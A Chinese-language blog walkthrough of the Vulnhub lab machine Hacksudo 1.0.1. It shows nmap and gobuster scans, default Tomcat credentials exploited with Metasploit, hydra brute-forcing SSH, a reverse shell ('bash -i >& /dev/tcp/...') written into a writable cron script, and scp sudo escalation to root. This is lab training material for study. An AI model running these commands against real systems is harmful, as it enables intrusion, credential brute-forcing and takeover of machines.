Vlunhub-Hacksudo系列1.0.1

  • Vlunhub-Hacksudo系列1.0.1已关闭评论
  • 34 views
  • A+

靶机环境

这个靶机是hacksudo系列的第一部。

靶机名称:Hacksudo1.0.1 IP地址为:192.168.17.143

攻击机:kali2021 IP地址为:192.168.17.131

主机发现

nmap -sC -sV -p- 192.168.17.143

wKg0C2CKVRaAIzwAAEQcWDCkaA218.png

发现开通了80、2222、8080三个端口。

进攻

使用gobuster来扫描网站后台包含html,txt,php的页面

gobuster dir -u http://192.168.17.143 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php

wKg0C2CBZ3AW8RsAAEaCHLdiI779.png

我们查看一些info.txt看一下能不能发现有用的信息。

wKg0C2CBY8mAVJEpAAB56B2FejQ739.png

发现了邮箱以及密码,我们进入/index.php将邮箱和密码登录查看一下

wKg0C2CBZIGAWM4AACjw1igzc582.png
登录成功发现是一个静态页面,没有发现可以跳转的界面,我们姑且先搁置找一下其他的突破点。

突然想起来扫描出来的目录里面还有user.sql呢,我们下载下来看看

wget http://192.168.17.143/user.sql

wKg0C2CBZ9eAPVCJAABv6Doavnw274.png

wKg0C2CBaLeAK1aAACECXOCmmA874.png

运行file命令,我们可以推断出它是一个简单的文本文件

wKg0C2CBaJyAd18AAAevujip0M997.png

我们直接使用vim编辑器查看一下

wKg0C2CBaPGAUSDWAAA4iocxr4o479.png

发现一个用户名和密码都是admin,这个是初始的用户名和密码,这可能是某一处的用户名和密码留着备用。

我们访问网站的8080端口:

wKg0C2CCieAW1uCAAGvEjvO6LY067.png

这里有Manager App,我们点击去看一下。

wKg0C2CCjAeADi03AABKomM6wNY581.png

需要输入用户名密码,我们尝试用admin作为用户名和密码尝试登录一下,发现可以登录成功!

wKg0<span class="knowKeyWords"  data-id="22" >C2</span>CCjEGAJyBGAAFXwCYB9Fk913.png

我们这知道Apache的版本为2.4.6,应该会一些已知可利用的漏洞,这就好办了,我们可以使用Metasploit检测一下它是否有文件上传漏洞。

wKg0C2CCjV6AJLrGAAFlwQp3MxQ705.png

在Metasploit中,我们将使用exploit / multi / http / tomcat_mgr_upload

use exploit/multi/http/tomcat_mgr_upload

shwo options

wKg0C2CCjdqAHJPRAAEyC3tIIBg944.png

发现漏洞利用的时,需要输入用户名和密码,目标的IP地址,以及端口号。

set HttpPassword admin
set HttpUsername admin
set RHOSTS 192.168.17.143
set RPORT 8080
exploit

wKg0C2CCjtWARc8EAADdSxM27KI076.png

我们成功获得一个shell,我们成功拿到tomcat用户的权限

wKg0C2CCjwmAFUznAAAujddmf34727.png

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm

让我们的shell更稳定一些同时导入xterm.

提权

进入home目录,发现有两个用户名,分别是hacksudo、vishal,靶机开通了ssh服务,端口为2222,我们尝试使用hydra对vishal用户以及hacksudo用户进行爆破,我们成功拿到了vishal用户的密码为hacker。

hydra -l vishal -w 10 -P passlist.txt -t 10 -v -f 192.168.17.143 ssh -s 2222

wKg0C2CCkx6AZaZAAEqMpBxk800.png

使用ssh进行连接,这里要注意的是,ssh使用的不是默认的端口,应该指定2222端口进行访问。

```
ssh -p 2222 [email protected]

```

wKg0C2CClimAGbpCAAEQoKnv9js768.png

此时我们已经拿到了vishal用户的权限,让我们进入/home/vishal目录下查看一下里面的文件

wKg0C2CCyGSAZrzOAAEvnTKryzI267.png

我们使用pspy64来查看一些系统后台运行的进程,这里使用使用Xftp将pspy64发送的靶机的/home/vishal文件夹中。

wKg0C2CClwmAUuSAAADDd8OGlE152.png

给pspy64添加执行权限并执行。

wKg0C2CCl1W<span class="knowKeyWords"  data-id="14" >AV</span>FujAABFeUBdRs4501.png

发现每两分钟都会执行manage.sh脚本

wKg0C2CCl36<span class="knowKeyWords"  data-id="14" >AV</span>4RxAAGiNQTSTMw293.png

我们的vishal用户对manage.sh拥有写入的权限。

将bash -i >& /dev/tcp/192.168.17.131/4455 0>&1写入到manage.sh

wKg0C2CCmS2AS2OyAAAvBSuiI4747.png

kali端监听4455端口nc -nlvp 4455

等待两分钟左右,我们拿到hacksudo的用户权限

wKg0C2CCmmOAOiKzAABZvjCPDUs021.png

使用sudo -l发现可以利用scp进行SUID提权

wKg0C2CCmpSAAHemAABvF54p8vs256.png

在gtfobins上查询scp利用的方法

wKg0C2CCmtmALeaAABjUItyW1M705.png

成功拿下root权限!

wKg0C2CCm7SAA51DAABdGzjsb10210.png

大功告成,成功获得flag~

wKg0C2CCm9eAGsPJAAAupTbhFP0413.png

相关推荐: Lower-SQL至系统沦陷

在一次edusrc挖掘中,发现了一个系统,对于学校来讲算是及其重要的一个系统,其中部署这大批量的教师+学生信息 同时这个功能点的验证码可以被绕过,拦截重放Intruder进行BP爆破,献上我的大字典并没有任何结果,阿巴阿巴.... 爆破无法成功,尝试一波sql…